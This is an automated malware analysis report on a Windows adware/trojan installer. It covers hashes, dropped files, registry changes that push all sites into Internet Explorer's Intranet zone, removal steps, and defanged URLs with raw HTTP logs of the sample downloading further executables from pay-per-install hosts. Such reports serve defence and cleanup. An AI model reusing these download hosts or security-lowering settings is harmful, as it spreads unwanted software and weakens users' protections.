not-a-virus:AdWare.Win32.AdLoad.erjk (Kaspersky), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: def705210ccd222720617c001d355d6e
SHA1: e10afc3fb2fa17020df1dc07a1f2a60f5630c6af
SHA256: 5373f1ef8512636223fc658a30724f696cf471cccf354cf4d73f4007d6a9b163
SSDeep: 12288:ydOv5jKhsfoPA yeVKUCUxP4C902bdRtJJPipFT6sEUigDkJ:ydq5TfcdHj4fmbCynEkJ
Size: 606131 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: OXQCN
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):
NojM0TDHJX.exe:1980
%original file name%.exe:1616
cpSetup.exe:568
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process NojM0TDHJX.exe:1980 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsx4.tmp (1778 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\1119458637 (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\nsArray.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\BgWorker.dll (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\cpSetup.exe (4805 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp (0 bytes)
The process %original file name%.exe:1616 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\S (179 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\NojM0TDHJX.exe (8278 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\NSISdl.dll (14 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (0 bytes)
The process cpSetup.exe:568 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IDELG32N\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00075542.a (1690 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4BSXI3UX\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q3O76FGN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00074d91.a (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx7.tmp (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx8.tmp\30ceeaa8-d617-448d-b9f9-8d4d26b32e50.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GNSBSD4B\desktop.ini (67 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsx6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx8.tmp (0 bytes)
Registry activity
The process NojM0TDHJX.exe:1980 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB 64 0C 52 E7 45 47 39 B5 A1 0E DB 47 CB 74 16"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process %original file name%.exe:1616 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "83 EC 84 9D 20 C2 B7 54 FE 10 CF EE 5B 8C DB 8A"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process cpSetup.exe:568 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB 05 05 B2 D0 2E A7 87 C1 BB E1 4E E3 6B C7 16"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web nodes without dots that do not belong to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
Dropped PE files
MD5 | File path |
---|---|
8ec3a46db0f5d311571b3c0c62dc0d05 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\00074d91.a |
e8f5383b782fee176aff1ff243f1f501 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\00075542.a |
a5f8399a743ab7f9c88c645c35b1ebb5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd2.tmp\NSISdl.dll |
905d7368f8c25e0b12e6c5c1e036e7b7 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd2.tmp\NojM0TDHJX.exe |
c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd2.tmp\System.dll |
33ec04738007e665059cf40bc0f0c22b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsn5.tmp\BgWorker.dll |
a5f8399a743ab7f9c88c645c35b1ebb5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsn5.tmp\NSISdl.dll |
c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsn5.tmp\System.dll |
30741f682e9d12149beb9266fb790426 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsn5.tmp\cpSetup.exe |
6206b94f91e92b7f7f72214c438dd414 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsn5.tmp\nsArray.dll |
c10e04dd4ad4277d5adc951bb331c777 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsn5.tmp\nsDialogs.dll |
0309822592797cc6d1052d2735f20065 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx8.tmp\30ceeaa8-d617-448d-b9f9-8d4d26b32e50.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\nsx4.tmp (1778 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\1119458637 (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\nsArray.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\BgWorker.dll (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\cpSetup.exe (4805 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\S (179 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\NojM0TDHJX.exe (8278 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IDELG32N\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00075542.a (1690 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4BSXI3UX\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q3O76FGN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00074d91.a (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx7.tmp (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx8.tmp\30ceeaa8-d617-448d-b9f9-8d4d26b32e50.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GNSBSD4B\desktop.ini (67 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23628 | 24064 | 4.46394 | 856b32eb77dfd6fb67f21d6543272da5 |
.rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
.data | 36864 | 154712 | 1024 | 3.3278 | 7922d4ce117d7d5b3ac2cffe4b0b5e4f |
.ndata | 192512 | 40960 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 233472 | 45048 | 45056 | 2.26212 | 5fffcf2497e851763fd62f4eee795079 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://dna4mm5c1mahl.cloudfront.net/launch_reb.php?p=sevenzip&tid=4272132&pid=735&n=V2luZG93cyBSZXBhaXIgUHJvZmVzc2lvbmFsIChBbGwgSW4gT25lKSAzLjIuMiArIFBvcnRhYmxlICsgU2VyaWFs&b_typ=pe | |
hxxp://d1gahxamcuu9d3.cloudfront.net/stub_maker.php?program=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial | |
hxxp://dna4mm5c1mahl.cloudfront.net/launch_v5.php?p=sevenzip&pid=735&tid=4272132&b_typ=pe&n=V2luZG93cyBSZXBhaXIgUHJvZmVzc2lvbmFsIChB&reb=1 | |
hxxp://d24txo22v2kbr3.cloudfront.net/?affId=1006&appTitle=Windows%20Repair%20Professional%20%28A&s1=735&s2=4272132&setupName=cpSetup&appVersion=2.92&instId=11 | |
hxxp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=735&aff_sub2=4272132&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.int-cp-234.xyz/offer.php?affId={aff_id}&trackingId=874446&instId=11&ho_trackingid={transaction_id}&cc=UA | 52.17.177.26 |
hxxp://up.int-cp-234.xyz/offer.php?affId=1006&trackingId=874446&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&cc=UA | 54.239.168.162 |
hxxp://up.int-cp-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA | 54.239.168.162 |
hxxp://up.int-cp2-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA | 54.88.21.193 |
hxxp://up.int-cp-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA&id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57 | 54.239.168.162 |
hxxp://get.fc-gosh.biz/launch_reb.php?p=sevenzip&tid=4272132&pid=735&n=V2luZG93cyBSZXBhaXIgUHJvZmVzc2lvbmFsIChBbGwgSW4gT25lKSAzLjIuMiArIFBvcnRhYmxlICsgU2VyaWFs&b_typ=pe | 54.239.168.254 |
hxxp://dl.fripp54.xyz/stub_maker.php?program=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial | 54.239.168.173 |
hxxp://get.cp-retr.xyz/?affId=1006&appTitle=Windows%20Repair%20Professional%20%28A&s1=735&s2=4272132&setupName=cpSetup&appVersion=2.92&instId=11 | 54.239.168.42 |
hxxp://tap.winre.xyz/launch_v5.php?p=sevenzip&pid=735&tid=4272132&b_typ=pe&n=V2luZG93cyBSZXBhaXIgUHJvZmVzc2lvbmFsIChB&reb=1 | 54.239.168.70 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET hXXp://up.int-cp-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA&id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57 HTTP/1.1
Host: up.int-cp-234.xyz
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 409128
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Thu, 13 Aug 2015 00:45:51 GMT
X-Cache: Miss from cloudfront
Via: 1.1 affe26bf02a36a4a45ea1eb3ce2b4a62.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 3AgamjltkJULGHtW2r49AY2gNqm91hyzrbUxeYApaBL7338gzXHjPw==
<<< skipped >>>
GET hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=735&aff_sub2=4272132&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.int-cp-234.xyz/offer.php?affId={aff_id}&trackingId=874446&instId=11&ho_trackingid={transaction_id}&cc=UA HTTP/1.1
Host: capital.go2cloud.org
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 13 Aug 2015 00:45:52 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Location: hXXp://up.int-cp-234.xyz/offer.php?affId=1006&trackingId=874446&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&cc=UA
P3P: CP="NOI CUR OUR NOR INT"
Pragma: no-cache
Server: nginx/1.7.9
Set-Cookie: enc_aff_session_4=ENC02414-102e22fe3dd0a0bd118638fce028d4-1006-4-0-0-0-0-UA-2-3131-373335-34323732313332-30-30-30-193.138.244.231-20150812204552-_-7B11052C012208017E2C3146051A2D427132034F4D51525A1C494616244946210D1A4E041130124B55; expires=Sat, 12 Sep 2015 00:45:52 GMT; path=/;
Set-Cookie: ho_mob=eyJtb2JpbGVfZGV2aWNlX29zIjoiRGVza3RvcCIsIm1vYmlsZV9kZXZpY2VfbW9kZWwiOiJGaXJlZm94IiwibW9iaWxlX2RldmljZV9icmFuZCI6Ik1vemlsbGEiLCJtb2JpbGVfYnJvd3NlciI6IkZpcmVmb3ggRGVza3RvcCIsIm1vYmlsZV9icm93c2VyX3ZlcnNpb24iOiIyLjAiLCJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBGcjsgUnY6MS44LjEuMykgR2Vja28vMjAwNzAzMDkgRmlyZWZveC8yLjAuMC4zIiwiY29ubmVjdGlvbl9zcGVlZCI6ImJyb2FkYmFuZCJ9; expires=Sat, 07 Jul 2018 11:25:52 GMT; path=/;
tracking_id: 102e22fe3dd0a0bd118638fce028d4
X-Robots-Tag: noindex, nofollow
Content-Length: 324
Connection: Close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>302 Found</title>.</head><body>.<h1>Found</h1>.<p>The document has moved <a href="hXXp://up.int-cp-234.xyz/offer.php?affId=1006&trackingId=874446&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&cc=UA">here</a>.</p>.</body></html>...
<<< skipped >>>
POST hXXp://up.int-cp2-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA HTTP/1.1
Host: up.int-cp2-234.xyz
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Content-Type: application/x-www-form-urlencoded
id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57
HTTP/1.1 411 Length Required
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Thu, 13 Aug 2015 00:45:50 GMT
Connection: close
Content-Length: 344
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""hXXp://VVV.w3.org/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>Length Required</TITLE>..<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>..<BODY><h2>Length Required</h2>..<hr><p>HTTP Error 411. The request must be chunked or have a content length.</p>..</BODY></HTML>....
GET hXXp://up.int-cp-234.xyz/offer.php?affId=1006&trackingId=874446&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&cc=UA HTTP/1.1
Host: up.int-cp-234.xyz
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 28712
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Thu, 13 Aug 2015 00:45:50 GMT
X-Cache: Miss from cloudfront
Via: 1.1 affe26bf02a36a4a45ea1eb3ce2b4a62.cloudfront.net (CloudFront)
X-Amz-Cf-Id: CHp6udWsvm6AJ4HQDfzA_lXU5e5L8IiqwlpdvQBL11cRTsy-wygohQ==
<<< skipped >>>
GET /stub_maker.php?program=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial HTTP/1.0
Host: dl.fripp54.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: application/force-download
Content-Length: 76885
Connection: close
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.28
Content-Disposition: attachment; filename="55cbe8acafcad.exe"
X-Powered-By: ASP.NET
Date: Thu, 13 Aug 2015 00:45:33 GMT
X-Cache: Miss from cloudfront
Via: 1.1 de7a549023f0ea5ae15f58d27aeb67c7.cloudfront.net (CloudFront)
X-Amz-Cf-Id: z8nqj6gQgmuWKT9oAIJTJr8kmfMfy_E9gLa5dRx5WTeY2Vba9TMkZg==
<<< skipped >>>
GET /launch_v5.php?p=sevenzip&pid=735&tid=4272132&b_typ=pe&n=V2luZG93cyBSZXBhaXIgUHJvZmVzc2lvbmFsIChB&reb=1 HTTP/1.0
Host: tap.winre.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 2322
Connection: close
Date: Thu, 13 Aug 2015 00:45:46 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: e2PKLPDCLOe9qGBiUN-s8dMvvEQm5jyb7gjuvI2-p-s-0xCQqXSOzg==
files=4.t1=dl.u1=hXXp://get.cp-retr.xyz/?affId=1006&appTitle=Windows%2520Repair%20Professional%20%28A&s1=735&s2=4272132&setupName=cpSetup&appVersion=2.92&instId=11.n1=cpSetup.exe.b1=cp.c1=sevenzip-1.s1=0.m1=0.d1=0.t2=dl.u2=hXXp://stapi.sweetcomet.com/api/stamp/setup.exe?&affiliateid=1780&productname=Windows%20Repair%20Professional%20%28A&producturl=http://d3pccup19xda2t.cloudfront.net/sevenzip-setup-ap.exe&productimage=http://d3pccup19xda2t.cloudfront.net/pe/szip_pub.png&productversion=9.20&producteula=http://sevenzip.info/terms.html&productsize=1.06MB&productcmd=s&publishercontact=http://sevenzip.info&productbusiness=sd,se,ad,co,prm%2Cwsa,ita,serp,bro&antivirusPolicy=2&subid=735&subid2=4272132.n2=SevenZip-apset.exe.b2=ap.c2=sevenzip.s2=0.m2=0.d2=0.t3=dl.u3=hXXp://b.byteguardoptic.com/de/?q=YWZmaWxpYXRlX2lkPTczNS00MjcyMTMyJmZpbGVzaXplPTIuNE1iJnB1Ymxpc2hlcklkPTI0NDM3JnByb2R1Y3RfbmFtZT1XaW5kb3dzJTIwUmVwYWlyJTIwUHJvZmVzc2lvbmFsJTIwKEEmcHJvZHVjdF90aXRsZT1XaW5kb3dzJTIwUmVwYWlyJTIwUHJvZmVzc2lvbmFsJTIwKEEmcHJvZHVjdF9kb3dubG9hZF91cmw9aHR0cCUzYSUyZiUyZmQzcGNjdXAxOXhkYTJ0LmNsb3VkZnJvbnQubmV0JTJmc2V2ZW56aXAtc2V0dXAtcnguZXhlJnByb2R1Y3RfZmlsZV9uYW1lPXNldmVuc2V0dXAuZXhlJmluc3RhbGxlcl9maWxlX25hbWU9c2V0dXA=.n3=sevensetup.exe.b3=rx.c3=sevenzip-1.s3=0.m3=0.d3=0.t4=dl.u4=hXXp://get.file136desktop.info/DownloadManager/Get?p=638&d=544&l=461&n=1&productname=sevenzip&d1=4272132&d2=735&dynamicname=Windows%2520Repair%20Professional%20%28A.n4=setup-1228.exe.b4=ru.c4=
<<< skipped >>>
GET /launch_reb.php?p=sevenzip&tid=4272132&pid=735&n=V2luZG93cyBSZXBhaXIgUHJvZmVzc2lvbmFsIChBbGwgSW4gT25lKSAzLjIuMiArIFBvcnRhYmxlICsgU2VyaWFs&b_typ=pe HTTP/1.0
Host: get.fc-gosh.biz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 179
Connection: close
Date: Thu, 13 Aug 2015 00:45:43 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 017ee4b2e5ba6b7a7dd1443f39b6e832.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 6QMHXEHuHyMgYmFpY2cxVQprTEKUWi9cTaXED_52oB9UA-kWfyWXOA==
s=first..u=hXXp://dl.fripp54.xyz/stub_maker.php?program=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial..
GET /?affId=1006&appTitle=Windows%20Repair%20Professional%20%28A&s1=735&s2=4272132&setupName=cpSetup&appVersion=2.92&instId=11 HTTP/1.0
Host: get.cp-retr.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 52212
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Content-Transfer-Encoding: Binary
Content-Disposition: attachment; filename="cpSetup.exe"
Date: Thu, 13 Aug 2015 00:45:47 GMT
X-Cache: Miss from cloudfront
Via: 1.1 1415e6a9d308119037d1fa89386da72a.cloudfront.net (CloudFront)
X-Amz-Cf-Id: qGMncVdA41NlISK5tz1w3zzoOgUy1l5m5tOFRCo78IYhdCrny4lkfQ==
<<< skipped >>>
POST hXXp://up.int-cp-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA HTTP/1.1
Host: up.int-cp-234.xyz
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Content-Type: application/x-www-form-urlencoded
